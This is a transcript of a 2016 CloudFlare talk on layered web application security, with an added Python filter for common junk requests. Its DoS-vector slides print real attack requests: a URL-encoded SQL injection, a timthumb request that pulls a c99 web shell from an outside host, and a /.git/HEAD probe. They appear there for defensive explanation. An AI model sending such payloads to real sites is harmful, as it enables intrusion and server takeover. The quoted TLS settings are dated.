latest trends in web application security
TRANSCRIPT
Web Application Security
John Graham-Cumming |Chief Technology Officer, CloudFlare
March 2016
Agenda
• Layered Web Application Security
• 2015 Top Web Application Attack Techniques
• Kitchen Sink Attacks
• TLS
Introduction
Our mission
Help build a better Internet
Standards/Platform | Availability | Security | Performance
Running applications on the Internet is challenging
“Hundreds of dollars a month for private hosting and it was still reliably crashing on or around decision day.”
“We're seeing some customers that are connecting to ixl.com via IPv6, which we are not equipped to handle.”
“The first flood of attack traffic was mitigated with some blocking techniques implemented by our CDN, but when the attack got more creative there was nothing more they could do.”
“Because our servers were only located in the U.S. at that time, some of our customers from other parts of the world were experiencing slower loading of the widget.”
We solve the challenges of the Internet
Standards/Platform
• Analytics
• IPv6 gateway
• DNSSEC
• Google SPDY + HTTP2
• Apps platform
Availability
• Load balancing
• Always online
• Redundant, Anycast network
Security
• Reputation-based security
• Distributed denial of service (DDoS) mitigation
• Firewall
• Secure socket layer (SSL)
• Malware detection
Performance
• Content delivery (CDN)
• Authoritative DNS
• Web content optimization (WCO)
• Front-end / mobile optimization
• Railgun™ WAN optimizer
Layered Web Application Security
What attackers attack
• Web applications themselves
  • e.g. attempted SQL injection
  • e.g. DoS by hitting a CPU-expensive URI
• Web servers
  • Attempted access to files on machines
  • SYN flooding to overwhelm TCP buffers
• Related infrastructure
  • Authoritative DNS for a domain / DNS poisoning
  • Domain registration
Layered Defense
• Secure Coding Practices
• Web Application Firewall
  • Can protect against application-level attacks
  • Use one that can be customized for your application
• DoS mitigation service
• DNS service that has withstood large DoS attacks
• DNSSEC
• A domain registrar with robust security policies to prevent transfer
Buying Time
• A WAF buys time to patch vulnerabilities
• Common to see vulnerabilities announced along with patches
• But how long does it take to patch?
Examples
• December 14, 2015: CVE-2015-8562
  • Joomla CMS Unserialize Vulnerability
  • Released without a patch
• April 25, 2015: SUPEE-5344
  • Magento RCE Vulnerability
• April 15, 2015: CVE-2015-1635
  • Windows Server RCE Vulnerability
2015 Top Web Application Attack Techniques
OWASP Top 10 in 2015
1. A5 Security Misconfiguration
2. A9 Using Components with Known Vulnerabilities
3. A6 Sensitive Data Exposure
4. A4 Insecure Direct Object References
5. A1 Injection
6. A3 XSS
7. A7 Missing Function Level Access Control
8. A8 Cross Site Request Forgery
9. A10 Unvalidated Redirects and Forwards
10. A2 Weak authentication and session management
Common Web DoS Vectors
• Requests without a user agent
  • Drop requests that have no User-Agent field
• WordPress pingback attacks
  • Drop WordPress pingbacks
• Fake user agent
  • Validate User-Agent to identify real browsers
Common Web DoS Vectors
• Faulty data sanitization
  /skin/interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20 count(*),concat((select%20concat(0x3a,md5(1122),\0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%232.
• Exploitation of timthumb for RCE
  GET /wp-content/themes/thumb.php?src=http://dsf2kh34as.co/c99.php
Common Web DoS Vectors
• Incorrect SCM data access
  GET /.git/HEAD HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
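The three drop rules from the two "Common Web DoS Vectors" slides above (no User-Agent, WordPress pingbacks, and requests for source-control metadata such as /.git/HEAD) as an edge-filter check in Python. This is an added example, not CloudFlare's code; the rule names, the request parser and the sample requests other than the /.git/HEAD probe are constructed, and the /.svn/ and /.hg/ paths go beyond the slide as the same class of exposure.

```python
import re
from typing import Dict, Optional, Tuple

# Source-control metadata directories that must never be reachable under the web root.
# /.git/ is the case on the slide; /.svn/ and /.hg/ are added as the same class of exposure.
SCM_PATH_RE = re.compile(r"^/(?:\.git|\.svn|\.hg)(?:/|$)")
# The fetch a WordPress site makes to verify a pingback identifies itself as "WordPress/x.y; <site> ...".
WP_PINGBACK_UA_RE = re.compile(r"^WordPress/\d")

def parse_request_head(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split an HTTP/1.x request head into (method, target, headers); header names lower-cased."""
    lines = raw.replace("\r\n", "\n").lstrip("\n").split("\n")
    parts = lines[0].split()
    method = parts[0] if parts else ""
    target = parts[1] if len(parts) > 1 else "/"
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line.strip():          # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers

def drop_reason(raw: str) -> Optional[str]:
    """Return the name of the rule a request trips, or None when it passes all three."""
    _method, target, headers = parse_request_head(raw)
    path = target.split("?", 1)[0]
    ua = headers.get("user-agent", "")
    if not ua:
        return "missing-user-agent"   # slide: drop requests that have no User-Agent field
    if WP_PINGBACK_UA_RE.match(ua):
        return "wordpress-pingback"   # slide: drop WordPress pingbacks
    if SCM_PATH_RE.match(path):
        return "scm-metadata-path"    # slide: the GET /.git/HEAD probe
    return None

# Constructed samples. GIT_PROBE is the request shown on the slide; the rest are made up.
GIT_PROBE = ("GET /.git/HEAD HTTP/1.1\r\n"
             "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)\r\n\r\n")
NO_UA = "GET /index.html HTTP/1.1\r\nHost: example.com\r\n\r\n"
PINGBACK = ("GET /blog/post?ref=1 HTTP/1.1\r\nHost: example.com\r\n"
            "User-Agent: WordPress/4.4; http://wp.example.net; verifying pingback from 192.0.2.10\r\n\r\n")
NORMAL = "GET /index.html HTTP/1.1\r\nHost: example.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n\r\n"

if __name__ == "__main__":
    for name, req in (("git-probe", GIT_PROBE), ("no-ua", NO_UA), ("pingback", PINGBACK), ("normal", NORMAL)):
        print(f"{name:10s} -> {drop_reason(req)}")
```

The "fake user agent" rule on the slide is not implemented here, since telling a real browser from a spoofed one needs signals beyond the header string itself.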
Kitchen Sink Attacks
Everything they've got
• Common to see attackers try multiple vectors to bring down a web site
  1. Simultaneous SYN flood, DNS reflection attack, and authoritative DNS attack
  2. Using multiple layer 7 (HTTP/HTTPS) botnets at the same time
  3. 1 and 2
Typical DoS volume at CloudFlare
Recent 400 Gbps DoS attacks
TLS
DROWN
March 1, 2016
CloudFlare's TLS Configuration
• Public and on Github
  https://github.com/cloudflare/sslconfig
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
ssl_ciphers EECDH+CHACHA20:EECDH+CHACHA20-draft:EECDH+AES128:RSA+AES128:EECDH+AES256:RSA+AES256:EECDH+3DES:RSA+3DES:!MD5;
ssl_prefer_server_ciphers on;
Conclusion
Conclusion
• Layered Defense
• Patch, but use a WAF to buy time
• Stay on top of TLS